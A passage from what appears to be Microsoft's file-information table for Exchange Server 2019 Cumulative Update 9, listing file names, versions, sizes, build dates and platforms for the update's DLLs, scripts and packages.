Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 9\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.858.9| 71,048| 04-Apr-2021| 08:28| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 04-Apr-2021| 08:33| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,969| 04-Apr-2021| 08:38| Not applicable \nAdemodule.dll| 15.2.858.9| 106,392| 04-Apr-2021| 08:29| x64 \nAirfilter.dll| 15.2.858.9| 42,872| 04-Apr-2021| 08:33| x64 \nAjaxcontroltoolkit.dll| 15.2.858.9| 92,568| 04-Apr-2021| 08:28| x86 \nAntispamcommon.ps1| Not applicable| 13,505| 04-Apr-2021| 08:38| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 04-Apr-2021| 08:35| Not applicable \nAsentirs.msi| Not applicable| 77,824| 04-Apr-2021| 08:33| Not applicable \nAsentsig.msi| Not applicable| 73,728| 04-Apr-2021| 08:35| Not applicable \nBigfunnel.bondtypes.dll| 15.2.858.9| 45,464| 04-Apr-2021| 08:33| x86 \nBigfunnel.common.dll| 15.2.858.9| 66,440| 04-Apr-2021| 08:30| x86 \nBigfunnel.configuration.dll| 15.2.858.9| 118,152| 04-Apr-2021| 08:31| x86 \nBigfunnel.entropy.dll| 15.2.858.9| 44,424| 04-Apr-2021| 08:30| x86 \nBigfunnel.filter.dll| 15.2.858.9| 54,160| 04-Apr-2021| 08:43| x86 \nBigfunnel.indexstream.dll| 15.2.858.9| 68,992| 04-Apr-2021| 08:32| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,168| 04-Apr-2021| 08:30| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.858.9| 19,864| 04-Apr-2021| 08:31| x86 \nBigfunnel.poi.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:33| x86 \nBigfunnel.postinglist.dll| 15.2.858.9| 189,320| 04-Apr-2021| 08:37| x86 \nBigfunnel.query.dll| 15.2.858.9| 101,248| 04-Apr-2021| 08:43| x86 \nBigfunnel.ranking.dll| 15.2.858.9| 109,448| 04-Apr-2021| 08:36| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.858.9| 3,634,568| 04-Apr-2021| 08:43| x86 \nBigfunnel.tracing.dll| 15.2.858.9| 42,880| 04-Apr-2021| 08:31| x86 \nBigfunnel.wordbreakers.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:33| x86 \nCafe_airfilter_dll| 15.2.858.9| 42,872| 04-Apr-2021| 08:33| x64 \nCafe_exppw_dll| 15.2.858.9| 83,352| 04-Apr-2021| 08:39| x64 \nCafe_owaauth_dll| 15.2.858.9| 92,040| 04-Apr-2021| 08:39| x64 \nCalcalculation.ps1| Not applicable| 42,097| 04-Apr-2021| 08:39| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,606| 04-Apr-2021| 08:39| Not applicable \nChksgfiles.dll| 15.2.858.9| 57,216| 04-Apr-2021| 08:39| x64 \nCitsconstants.ps1| Not applicable| 15,805| 04-Apr-2021| 08:36| Not applicable \nCitslibrary.ps1| Not applicable| 82,680| 04-Apr-2021| 08:36| Not applicable \nCitstypes.ps1| Not applicable| 14,464| 04-Apr-2021| 08:36| Not applicable \nClassificationengine_mce| 15.2.858.9| 1,693,576| 04-Apr-2021| 08:27| Not applicable \nClusmsg.dll| 15.2.858.9| 134,024| 04-Apr-2021| 08:41| x64 \nCoconet.dll| 15.2.858.9| 48,008| 04-Apr-2021| 08:31| x64 \nCollectovermetrics.ps1| Not applicable| 81,684| 04-Apr-2021| 08:39| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,870| 04-Apr-2021| 08:38| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,931| 04-Apr-2021| 08:33| Not applicable \nComplianceauditservice.exe| 15.2.858.10| 39,832| 04-Apr-2021| 08:39| x86 \nConfigureadam.ps1| Not applicable| 22,804| 04-Apr-2021| 08:35| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,348| 04-Apr-2021| 08:38| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,035| 04-Apr-2021| 08:39| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,810| 04-Apr-2021| 08:36| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,868| 04-Apr-2021| 08:37| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,323| 04-Apr-2021| 08:37| Not applicable \nConnectfunctions.ps1| Not applicable| 37,141| 04-Apr-2021| 08:43| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,420| 04-Apr-2021| 08:43| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,272| 04-Apr-2021| 08:31| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,089| 04-Apr-2021| 08:37| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,572| 04-Apr-2021| 08:38| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,805| 04-Apr-2021| 08:37| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,952| 04-Apr-2021| 08:38| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts_exsmime.dll| 15.2.858.9| 380,792| 04-Apr-2021| 08:31| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.858.9| 1,686,936| 04-Apr-2021| 08:32| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:38| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:39| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:39| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:38| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:35| x86 \nDagcommonlibrary.ps1| Not applicable| 60,226| 04-Apr-2021| 08:36| Not applicable \nDependentassemblygenerator.exe| 15.2.858.9| 22,416| 04-Apr-2021| 08:39| x86 \nDiaghelper.dll| 15.2.858.9| 66,968| 04-Apr-2021| 08:32| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,334| 04-Apr-2021| 08:38| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,402| 04-Apr-2021| 08:37| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,229| 04-Apr-2021| 08:37| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,690| 04-Apr-2021| 08:33| Not applicable \nDisklockerapi.dll| Not applicable| 22,392| 04-Apr-2021| 08:38| x64 \nDlmigrationmodule.psm1| Not applicable| 39,620| 04-Apr-2021| 08:36| Not applicable \nDsaccessperf.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:30| x64 \nDscperf.dll| 15.2.858.9| 32,640| 04-Apr-2021| 08:42| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.858.9| 1,686,936| 04-Apr-2021| 08:32| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.858.9| 601,464| 04-Apr-2021| 08:33| x86 \nEcpperfcounters.xml| Not applicable| 31,144| 04-Apr-2021| 08:28| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nEdgetransport.exe| 15.2.858.10| 49,536| 04-Apr-2021| 08:39| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:39| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:43| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:44| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:38| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,664| 04-Apr-2021| 08:39| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:44| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,404| 04-Apr-2021| 08:35| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,603| 04-Apr-2021| 08:36| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,624| 04-Apr-2021| 08:36| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,634| 04-Apr-2021| 08:38| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,952| 04-Apr-2021| 08:37| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,687| 04-Apr-2021| 08:33| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x86 \nEscprint.dll| 15.2.858.9| 20,360| 04-Apr-2021| 08:39| x64 \nEse.dll| 15.2.858.9| 3,741,584| 04-Apr-2021| 08:31| x64 \nEseback2.dll| 15.2.858.9| 350,080| 04-Apr-2021| 08:29| x64 \nEsebcli2.dll| 15.2.858.9| 318,328| 04-Apr-2021| 08:41| x64 \nEseperf.dll| 15.2.858.9| 108,928| 04-Apr-2021| 08:40| x64 \nEseutil.exe| 15.2.858.9| 425,368| 04-Apr-2021| 08:42| x64 \nEsevss.dll| 15.2.858.9| 44,440| 04-Apr-2021| 08:35| x64 \nEtweseproviderresources.dll| 15.2.858.9| 101,256| 04-Apr-2021| 08:39| x64 \nEventperf.dll| 15.2.858.9| 59,768| 04-Apr-2021| 08:27| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,093| 04-Apr-2021| 08:44| Not applicable \nExchange.format.ps1xml| Not applicable| 649,694| 04-Apr-2021| 08:43| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,323| 04-Apr-2021| 08:43| Not applicable \nExchange.ps1| Not applicable| 20,807| 04-Apr-2021| 08:43| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,535| 04-Apr-2021| 08:38| Not applicable \nExchange.types.ps1xml| Not applicable| 365,149| 04-Apr-2021| 08:44| Not applicable \nExchangeudfcommon.dll| 15.2.858.9| 122,744| 04-Apr-2021| 08:39| x86 \nExchangeudfs.dll| 15.2.858.9| 272,776| 04-Apr-2021| 08:39| x86 \nExchmem.dll| 15.2.858.9| 86,400| 04-Apr-2021| 08:29| x64 \nExchsetupmsg.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:39| x64 \nExdbfailureitemapi.dll| Not applicable| 27,032| 04-Apr-2021| 08:38| x64 \nExdbmsg.dll| 15.2.858.9| 230,800| 04-Apr-2021| 08:39| x64 \nExeventperfplugin.dll| 15.2.858.9| 25,472| 04-Apr-2021| 08:32| x64 \nExmime.dll| 15.2.858.9| 364,928| 04-Apr-2021| 08:39| x64 \nExportedgeconfig.ps1| Not applicable| 27,431| 04-Apr-2021| 08:37| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,594| 04-Apr-2021| 08:38| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,242| 04-Apr-2021| 08:36| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,374| 04-Apr-2021| 08:39| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,157| 04-Apr-2021| 08:37| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,080| 04-Apr-2021| 08:37| Not applicable \nExppw.dll| 15.2.858.9| 83,352| 04-Apr-2021| 08:39| x64 \nExprfdll.dll| 15.2.858.9| 26,520| 04-Apr-2021| 08:43| x64 \nExrpc32.dll| 15.2.858.9| 2,029,448| 04-Apr-2021| 08:34| x64 \nExrw.dll| 15.2.858.9| 28,056| 04-Apr-2021| 08:30| x64 \nExsetdata.dll| 15.2.858.9| 2,779,528| 04-Apr-2021| 08:39| x64 \nExsetup.exe| 15.2.858.10| 35,224| 04-Apr-2021| 08:39| x86 \nExsetupui.exe| 15.2.858.10| 471,936| 04-Apr-2021| 08:39| x86 \nExtrace.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:31| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.858.9| 601,464| 04-Apr-2021| 08:33| x86 \nExwatson.dll| 15.2.858.9| 44,936| 04-Apr-2021| 08:27| x64 \nFastioext.dll| 15.2.858.9| 60,312| 04-Apr-2021| 08:39| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,630| 04-Apr-2021| 08:38| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,227| 04-Apr-2021| 08:39| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,759| 04-Apr-2021| 08:39| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,404| 04-Apr-2021| 08:33| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,656| 04-Apr-2021| 08:33| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,758| 04-Apr-2021| 08:39| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,627| 04-Apr-2021| 08:39| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,603| 04-Apr-2021| 08:38| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 04-Apr-2021| 08:28| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,344| 04-Apr-2021| 08:39| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,258| 04-Apr-2021| 08:39| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,753| 04-Apr-2021| 08:39| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,729| 04-Apr-2021| 08:39| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,759| 04-Apr-2021| 08:39| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,633| 04-Apr-2021| 08:38| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,657| 04-Apr-2021| 08:39| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,756| 04-Apr-2021| 08:38| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,633| 04-Apr-2021| 08:38| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 04-Apr-2021| 08:29| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,639,490| 04-Apr-2021| 08:28| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,776| 04-Apr-2021| 08:39| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,633| 04-Apr-2021| 08:39| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,639| 04-Apr-2021| 08:39| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 04-Apr-2021| 08:27| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,267| 04-Apr-2021| 08:34| Not applicable \nFilteringpowershell.dll| 15.2.858.9| 223,096| 04-Apr-2021| 08:28| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,668| 04-Apr-2021| 08:27| Not applicable \nFiltermodule.dll| 15.2.858.9| 180,120| 04-Apr-2021| 08:28| x64 \nFipexeuperfctrresource.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:32| x64 \nFipexeventsresource.dll| 15.2.858.9| 44,944| 04-Apr-2021| 08:33| x64 \nFipexperfctrresource.dll| 15.2.858.9| 32,664| 04-Apr-2021| 08:27| x64 \nFirewallres.dll| 15.2.858.9| 72,584| 04-Apr-2021| 08:32| x64 \nFms.exe| 15.2.858.9| 1,350,016| 04-Apr-2021| 08:28| x64 \nForefrontactivedirectoryconnector.exe| 15.2.858.9| 110,968| 04-Apr-2021| 08:39| x64 \nFpsdiag.exe| 15.2.858.9| 18,824| 04-Apr-2021| 08:28| x86 \nFsccachedfilemanagedlocal.dll| 15.2.858.9| 822,144| 04-Apr-2021| 08:29| x64 \nFscconfigsupport.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:28| x86 \nFscconfigurationserver.exe| 15.2.858.9| 430,976| 04-Apr-2021| 08:27| x64 \nFscconfigurationserverinterfaces.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:32| x86 \nFsccrypto.dll| 15.2.858.9| 208,792| 04-Apr-2021| 08:28| x64 \nFscipcinterfaceslocal.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:27| x86 \nFscipclocal.dll| 15.2.858.9| 38,264| 04-Apr-2021| 08:27| x86 \nFscsqmuploader.exe| 15.2.858.9| 453,528| 04-Apr-2021| 08:28| x64 \nGetucpool.ps1| Not applicable| 19,811| 04-Apr-2021| 08:36| Not applicable \nGetvalidengines.ps1| Not applicable| 13,274| 04-Apr-2021| 08:36| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,829| 04-Apr-2021| 08:38| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,655| 04-Apr-2021| 08:38| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,711| 04-Apr-2021| 08:39| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,775| 04-Apr-2021| 08:39| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,498| 04-Apr-2021| 08:39| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,689| 04-Apr-2021| 08:38| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,790| 04-Apr-2021| 08:39| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,376| 04-Apr-2021| 08:36| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,983| 04-Apr-2021| 08:36| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,062| 04-Apr-2021| 08:38| Not applicable \nGet_storetrace.ps1| Not applicable| 51,871| 04-Apr-2021| 08:39| Not applicable \nHuffman_xpress.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:30| x64 \nImportedgeconfig.ps1| Not applicable| 77,280| 04-Apr-2021| 08:37| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,516| 04-Apr-2021| 08:37| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,858| 04-Apr-2021| 08:38| Not applicable \nInproxy.dll| 15.2.858.9| 85,896| 04-Apr-2021| 08:34| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,523| 04-Apr-2021| 08:39| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,929| 04-Apr-2021| 08:39| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,983| 04-Apr-2021| 08:38| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 107,392| 04-Apr-2021| 08:30| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 20,360| 04-Apr-2021| 08:33| Not applicable \nInterop.certenroll.dll| 15.2.858.9| 142,736| 04-Apr-2021| 08:31| x86 \nInterop.licenseinfointerface.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:33| x86 \nInterop.netfw.dll| 15.2.858.9| 34,184| 04-Apr-2021| 08:28| x86 \nInterop.plalibrary.dll| 15.2.858.9| 72,600| 04-Apr-2021| 08:28| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 27,016| 04-Apr-2021| 08:33| Not applicable \nInterop.taskscheduler.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:27| x86 \nInterop.wuapilib.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:39| x86 \nInterop.xenroll.dll| 15.2.858.9| 39,816| 04-Apr-2021| 08:31| x86 \nKerbauth.dll| 15.2.858.9| 62,848| 04-Apr-2021| 08:42| x64 \nLicenseinfointerface.dll| 15.2.858.9| 643,464| 04-Apr-2021| 08:29| x64 \nLpversioning.xml| Not applicable| 20,470| 04-Apr-2021| 08:34| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,920| 04-Apr-2021| 08:39| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.858.9| 138,640| 04-Apr-2021| 08:34| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,277| 04-Apr-2021| 08:39| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,372| 04-Apr-2021| 08:38| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,127| 04-Apr-2021| 08:36| Not applicable \nMce.dll| 15.2.858.9| 1,693,576| 04-Apr-2021| 08:27| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,487| 04-Apr-2021| 08:39| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,663| 04-Apr-2021| 08:37| Not applicable \nMicrosoft.database.isam.dll| 15.2.858.9| 127,880| 04-Apr-2021| 08:39| x86 \nMicrosoft.dkm.proxy.dll| 15.2.858.9| 26,008| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.858.9| 68,488| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.858.10| 233,368| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.858.9| 43,400| 04-Apr-2021| 08:38| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.858.10| 1,776,000| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.858.10| 505,216| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.858.10| 76,160| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.858.10| 135,568| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.858.9| 23,448| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.858.10| 27,016| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.858.10| 53,656| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.assistants.dll| 15.2.858.10| 925,056| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.858.9| 25,976| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.858.9| 43,400| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.858.10| 15,232| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.858.9| 14,720| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.858.10| 70,528| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.858.10| 94,600| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.858.10| 36,744| 04-Apr-2021| 